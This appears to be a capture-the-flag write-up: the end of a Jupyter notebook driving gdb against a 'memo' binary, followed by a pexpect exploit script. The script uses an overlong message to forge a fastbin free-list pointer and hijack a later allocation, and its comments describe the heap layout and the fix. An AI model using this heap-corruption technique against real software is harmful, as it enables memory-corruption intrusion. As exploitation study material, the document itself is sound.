" [ 0x603060 ] (48)\n",
"[ fb 2 ] 0x7ffff7dd4af8 -> [ 0x0 ] \n",
"[ fb 3 ] 0x7ffff7dd4b00 -> [ 0x0 ] \n",
"[ fb 4 ] 0x7ffff7dd4b08 -> [ 0x0 ] \n",
"[ fb 5 ] 0x7ffff7dd4b10 -> [ 0x0 ] \n",
"[ fb 6 ] 0x7ffff7dd4b18 -> [ 0x0 ] \n",
"[ fb 7 ] 0x7ffff7dd4b20 -> [ 0x0 ] \n",
"[ fb 8 ] 0x7ffff7dd4b28 -> [ 0x0 ] \n",
"[ fb 9 ] 0x7ffff7dd4b30 -> [ 0x0 ] \n",
"\u001b[;31mgdb-peda$ \u001b[0mContinuing.\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> "
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 8,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"TOOMUCH=96\n",
"NEWSIZE=struct.pack(\"<Q\", 0x20)\n",
"NEWPTR=struct.pack(\"<Q\", 0x603060)\n",
"ZERO=struct.pack(\"<Q\", 0)\n",
"print(NEWSIZE, NEWPTR, ZERO)\n",
"# alloc(1)\n",
"p.sendline(\"1\")\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"1\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(TOOMUCH))\n",
"p.expect(\"message too long, you can leave on memo though\")\n",
"print(\"--->{0}\".format(p.sendline(0x20 * 'D' + ZERO + NEWSIZE + NEWPTR)))\n",
"#print(\"--->{0}\".format(p.sendline(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ123456abcdefghijklmnopqrstuvwxyz12345\")))\n",
"\n",
"p.expect(\"peda\\$\")\n",
"p.sendline(\"x/8xw 0x603030\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"p.readline()\n",
"p.sendline('python from libheap import *')\n",
"p.expect(\"peda\\$\")\n",
"p.sendline(\"heap -f\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"\n",
"p.expect(\">> \")"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"1\n",
"Index: 2\n",
"Length: 31\n",
"*** Error in `/home/p1kachu/Dropbox/TMP/bkp/memo': malloc(): memory corruption (fast): 0x0000000000603040 ***\n",
"======= Backtrace: =========\n",
"/usr/lib/libc.so.6(+0x70c4b)[0x7ffff7aacc4b]\n",
"/usr/lib/libc.so.6(+0x76fe6)[0x7ffff7ab2fe6]\n",
"/usr/lib/libc.so.6(+0x79411)[0x7ffff7ab5411]\n",
"/usr/lib/libc.so.6(__libc_malloc+0x54)[0x7ffff7ab6d44]\n",
"/home/p1kachu/Dropbox/TMP/bkp/memo[0x400cd2]\n",
"/home/p1kachu/Dropbox/TMP/bkp/memo[0x4011aa]\n",
"/usr/lib/libc.so.6(__libc_start_main+0xf1)[0x7ffff7a5c291]\n",
"/home/p1kachu/Dropbox/TMP/bkp/memo[0x4008c9]\n",
"======= Memory map: ========\n",
"00400000-00402000 r-xp 00000000 08:04 57556941 /home/p1kachu/Dropbox/TMP/bkp/memo\n",
"00601000-00602000 r--p 00001000 08:04 57556941 /home/p1kachu/Dropbox/TMP/bkp/memo\n",
"00602000-00603000 rw-p 00002000 08:04 57556941 /home/p1kachu/Dropbox/TMP/bkp/memo\n",
"00603000-00624000 rw-p 00000000 00:00 0 [heap]\n",
"7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 \n",
"7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 \n",
"7ffff7825000-7ffff783b000 r-xp 00000000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff783b000-7ffff7a3a000 ---p 00016000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff7a3a000-7ffff7a3b000 r--p 00015000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff7a3b000-7ffff7a3c000 rw-p 00016000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff7a3c000-7ffff7bd1000 r-xp 00000000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7bd1000-7ffff7dd0000 ---p 00195000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7dd0000-7ffff7dd4000 r--p 00194000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7dd4000-7ffff7dd6000 rw-p 00198000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7dd6000-7ffff7dda000 rw-p 00000000 00:00 0 \n",
"7ffff7dda000-7ffff7dfd000 r-xp 00000000 08:02 2184928 /usr/lib/ld-2.24.so\n",
"7ffff7fc7000-7ffff7fc9000 rw-p 00000000 00:00 0 \n",
"7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 \n",
"7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]\n",
"7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]\n",
"7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:02 2184928 /usr/lib/ld-2.24.so\n",
"7ffff7ffd000-7ffff7ffe000 rw-p 00023000 08:02 2184928 /usr/lib/ld-2.24.so\n",
"7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 \n",
"7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]\n",
"ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n",
"\n",
"Program received signal SIGABRT, Aborted.\n",
"0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\n",
"\u001b[;31mgdb-peda$ \u001b[0m"
]
},
{
"ename": "TIMEOUT",
"evalue": "Timeout exceeded.\n<pexpect.pty_spawn.spawn object at 0x7fb88066a3d0>\ncommand: /usr/bin/gdb\nargs: ['/usr/bin/gdb', './memo']\nbuffer (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nbefore (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nafter: <class 'pexpect.exceptions.TIMEOUT'>\nmatch: None\nmatch_index: None\nexitstatus: None\nflag_eof: False\npid: 26466\nchild_fd: 52\nclosed: False\ntimeout: 30\ndelimiter: <class 'pexpect.exceptions.EOF'>\nlogfile: <ipykernel.iostream.OutStream object at 0x7fb883743e50>\nlogfile_read: None\nlogfile_send: None\nmaxread: 2000\nignorecase: False\nsearchwindowsize: None\ndelaybeforesend: 0.05\ndelayafterclose: 0.1\ndelayafterterminate: 0.1\nsearcher: searcher_re:\n 0: re.compile(\"Message: \")",
"output_type": "error",
"traceback": [
"\u001b[0;31m\u001b[0m",
"\u001b[0;31mTIMEOUT\u001b[0mTraceback (most recent call last)",
"\u001b[0;32m<ipython-input-9-d1cb50506b19>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m()\u001b[0m\n\u001b[1;32m 7\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m\"Length: \"\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 8\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0msendline\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mstr\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mSIZE\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m----> 9\u001b[0;31m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m\"Message: \"\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 10\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0msendline\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mSIZE\u001b[0m \u001b[0;34m*\u001b[0m \u001b[0;34m'A'\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 11\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m\">> \"\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/spawnbase.pyc\u001b[0m in \u001b[0;36mexpect\u001b[0;34m(self, pattern, timeout, searchwindowsize, async)\u001b[0m\n\u001b[1;32m 319\u001b[0m \u001b[0mcompiled_pattern_list\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mcompile_pattern_list\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpattern\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 320\u001b[0m return self.expect_list(compiled_pattern_list,\n\u001b[0;32m--> 321\u001b[0;31m timeout, searchwindowsize, async)\n\u001b[0m\u001b[1;32m 322\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 323\u001b[0m def expect_list(self, pattern_list, timeout=-1, searchwindowsize=-1,\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/spawnbase.pyc\u001b[0m in \u001b[0;36mexpect_list\u001b[0;34m(self, pattern_list, timeout, searchwindowsize, async)\u001b[0m\n\u001b[1;32m 343\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mexpect_async\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mtimeout\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 344\u001b[0m \u001b[0;32melse\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 345\u001b[0;31m \u001b[0;32mreturn\u001b[0m \u001b[0mexp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect_loop\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mtimeout\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 346\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 347\u001b[0m def expect_exact(self, pattern_list, timeout=-1, searchwindowsize=-1,\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/expect.pyc\u001b[0m in \u001b[0;36mexpect_loop\u001b[0;34m(self, timeout)\u001b[0m\n\u001b[1;32m 105\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0meof\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0me\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 106\u001b[0m \u001b[0;32mexcept\u001b[0m \u001b[0mTIMEOUT\u001b[0m \u001b[0;32mas\u001b[0m \u001b[0me\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 107\u001b[0;31m \u001b[0;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mtimeout\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0me\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 108\u001b[0m \u001b[0;32mexcept\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 109\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0merrored\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/expect.pyc\u001b[0m in \u001b[0;36mtimeout\u001b[0;34m(self, err)\u001b[0m\n\u001b[1;32m 68\u001b[0m \u001b[0;32mif\u001b[0m \u001b[0merr\u001b[0m \u001b[0;32mis\u001b[0m \u001b[0;32mnot\u001b[0m \u001b[0mNone\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 69\u001b[0m \u001b[0mmsg\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mstr\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0merr\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;34m+\u001b[0m \u001b[0;34m'\\n'\u001b[0m \u001b[0;34m+\u001b[0m \u001b[0mmsg\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 70\u001b[0;31m \u001b[0;32mraise\u001b[0m \u001b[0mTIMEOUT\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 71\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 72\u001b[0m \u001b[0;32mdef\u001b[0m \u001b[0merrored\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mTIMEOUT\u001b[0m: Timeout exceeded.\n<pexpect.pty_spawn.spawn object at 0x7fb88066a3d0>\ncommand: /usr/bin/gdb\nargs: ['/usr/bin/gdb', './memo']\nbuffer (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nbefore (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nafter: <class 'pexpect.exceptions.TIMEOUT'>\nmatch: None\nmatch_index: None\nexitstatus: None\nflag_eof: False\npid: 26466\nchild_fd: 52\nclosed: False\ntimeout: 30\ndelimiter: <class 'pexpect.exceptions.EOF'>\nlogfile: <ipykernel.iostream.OutStream object at 0x7fb883743e50>\nlogfile_read: None\nlogfile_send: None\nmaxread: 2000\nignorecase: False\nsearchwindowsize: None\ndelaybeforesend: 0.05\ndelayafterclose: 0.1\ndelayafterterminate: 0.1\nsearcher: searcher_re:\n 0: re.compile(\"Message: \")"
]
}
],
"source": [
"SIZE=31\n",
"\n",
"# alloc(2)\n",
"p.sendline(\"1\")\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"2\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")\n",
"\n",
"# alloc(0)\n",
"p.sendline('1')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"0\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 2",
"language": "python",
"name": "python2"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 2
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython2",
"version": "2.7.13"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
#!/usr/bin/env python2
# Without gdb
import pexpect
import struct
import sys
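p = pexpect.spawn('./memo')
p.logfile = sys.stdout
p.setecho(False)

# Heap layout the author observed for the memo slots (the ipynb variant of
# this gist holds the gdb session). Each slot is a 0x30-byte chunk; the
# columns are the chunk header fields followed by the user data.
#
# malloc pointer
# |
# slots: v
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# malloc(2) = 0x603040 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# free(2) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# free(1) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0x424242...
# malloc(2) = 0x603040 | ...0x4242... (8 bytes) | ...0x4242... (8 bytes) | 0xDATA (32 bytes)
# malloc(0) = 0x424242.... | 0x0 (8bytes) | 0x1000 (8 bytes) | 0xDATA (LOT OF BYTES)

# Menu choices of the binary, as answered to its ">> " prompt.
MENU_ALLOC = "1"
MENU_FREE = '4'


def expect_prompt():
    """Block until the binary shows its main-menu prompt again."""
    p.expect(">> ")


def alloc_slot(index, length, message, prompt="Message: "):
    """Drive menu option 1 (store a memo in slot `index`).

    index   -- slot number, sent as a string in answer to "Index: "
    length  -- value sent in answer to "Length: "; from it the binary either
               prints "Message: " or the "message too long ..." notice
    message -- bytes sent once `prompt` has been seen
    prompt  -- text to wait for before sending `message`; the default is the
               normal path, the overflow step below passes the "too long" notice
    """
    p.sendline(MENU_ALLOC)
    p.expect("Index: ")
    p.sendline(index)
    p.expect("Length: ")
    p.sendline(str(length))
    p.expect(prompt)
    p.sendline(message)
    expect_prompt()


def free_slot(index):
    """Drive menu option 4 (release the memo in slot `index`)."""
    p.sendline(MENU_FREE)
    p.expect("Index: ")
    p.sendline(index)
    expect_prompt()


# Login dialogue. expect() patterns are regexes, so '?' and '(' ')' must be
# escaped; the raw string keeps Python itself from touching the backslashes
# (Python 2 happened to preserve them in a plain string, newer versions warn).
p.expect("What's user name:")
p.sendline("P1kachu")
p.expect(r"Do you wanna set password\? \(y/n\)")
p.sendline("y")
p.expect("Password: ")
p.sendline("/bin/sh")
expect_prompt()

SIZE = 31

# Two adjacent slots, released in reverse order so both end up on the free
# list (rows "free(2)" / "free(1)" of the diagram).
alloc_slot("1", SIZE, SIZE * 'A')
alloc_slot("2", SIZE, SIZE * 'A')
free_slot("2")
free_slot("1")

# Overflow step. A length of 96 is rejected by the binary's length check, yet
# the "message too long" path still reads the message (the script relies on
# that: it waits for the notice, sends the data and gets the prompt back).
# 0x20 bytes of filler cover slot 1's data area; the three packed qwords then
# land on slot 2's header and its first free-list pointer, matching the
# overwritten fields in the diagram's second "malloc(2)" row. The fix on the
# binary's side is to bound the copy by the size that was actually allocated,
# or to discard the input entirely once the length is rejected.
# Python 2 only: struct.pack() returns str here, so it concatenates with the
# 'D' filler without an explicit encode.
TOOMUCH = 96
NEWSIZE = struct.pack("<Q", 0x20)
NEWPTR = struct.pack("<Q", 0x603060)
ZERO = struct.pack("<Q", 0)
alloc_slot("1", TOOMUCH, 0x20 * 'D' + ZERO + NEWSIZE + NEWPTR,
           prompt="message too long, you can leave on memo though")

# Re-allocate slot 2, then slot 0. With the free-list pointer forged above the
# last allocation appears to be served from NEWPTR instead of a fresh chunk
# (last row of the diagram) -- confirm in the gdb session. The script stops
# here; nothing further is done with slot 0.
alloc_slot("2", SIZE, SIZE * 'A')
alloc_slot("0", SIZE, SIZE * 'A')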